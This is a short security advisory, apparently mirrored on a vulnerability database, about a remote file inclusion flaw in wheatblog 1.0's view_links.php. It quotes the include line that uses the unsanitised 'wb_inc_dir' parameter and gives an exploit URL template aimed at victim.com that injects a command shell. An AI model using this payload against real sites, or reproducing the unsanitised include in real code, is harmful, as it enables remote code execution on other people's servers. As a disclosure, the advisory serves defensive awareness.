Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13125
HistoryJun 13, 2006 - 12:00 a.m.

wheatblog 1.0 Version - "wb_inc_dir" Parameter File Inclusion Vulnerability

2006-06-1300:00:00
vulners.com
11

SaVSaK.CoM | SpC-x - The-BeKiR |

wheatblog 1.0 Version - "wb_inc_dir" Parameter File Inclusion Vulnerability

Risk : High

Class: Remote

Script : wheatblog

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke

Code :

require_once('./settings.php');

$page_title = ':: view links';

include_once("$wb_inc_dir/header.php");

Vulnerable :

http://www.victim.com/wheatblog/view_links.php?wb_inc_dir=Command-Shell